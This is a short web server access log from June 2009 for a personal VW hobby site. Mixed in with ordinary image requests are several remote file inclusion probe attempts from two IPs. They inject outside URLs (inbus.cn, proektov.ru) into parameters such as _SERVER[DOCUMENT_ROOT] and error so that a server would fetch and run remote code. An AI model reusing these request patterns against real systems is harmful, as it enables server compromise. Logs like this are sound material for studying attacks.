207.229.140.121 - - [07/Jun/2009:11:31:21 -0400] "GET /~techrat/vw_spotters/vw_411_wagen_f.jpg HTTP/1.1" 200 15909
207.229.140.121 - - [07/Jun/2009:11:31:23 -0400] "GET /~techrat/vw_spotters/vw_412detail.jpg HTTP/1.1" 200 81083
207.229.140.121 - - [07/Jun/2009:11:31:24 -0400] "GET /favicon.ico HTTP/1.1" 200 318
200.142.148.142 - - [07/Jun/2009:11:31:25 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://inbus.cn/home/copyright.txt?? HTTP/1.1" 200 2294
200.142.148.142 - - [07/Jun/2009:11:31:25 -0400] "GET /logs/access_log%20%20////?_SERVER[DOCUMENT_ROOT]=http://inbus.cn/home/copyright.txt?? HTTP/1.1" 404 227
60.251.217.4 - - [07/Jun/2009:11:31:31 -0400] "GET /errors.php?error=http://www.proektov.ru/id.txt?? HTTP/1.1" 404 216
60.251.217.4 - - [07/Jun/2009:11:32:09 -0400] "GET /logs/access_log/errors.php?error=http://www.proektov.ru/id.txt?? HTTP/1.1" 404 232
60.251.217.4 - - [07/Jun/2009:11:32:10 -0400] "GET /logs/errors.php?error=http://www.proektov.ru/id.txt?? HTTP/1.1" 404 221
60.251.217.4 - - [07/Jun/2009:11:32:14 -0400] "GET /errors.php?error=http://www.proektov.ru/id.txt?? HTTP/1.1" 404 216
60.251.217.4 - - [07/Jun/2009:11:32:20 -0400] "GET /logs/access_log/errors.php?error=http://www.proektov.ru/id.txt?? HTTP/1.1" 404 232
200.142.148.142 - - [07/Jun/2009:11:32:37 -0400] "GET /logs/error_log%20%20////?_SERVER[DOCUMENT_ROOT]=http://inbus.cn/home/copyright.txt?? HTTP/1.1" 404 226
207.229.140.121 - - [07/Jun/2009:11:32:44 -0400] "GET /~techrat/ratrod/ HTTP/1.1" 200 11301
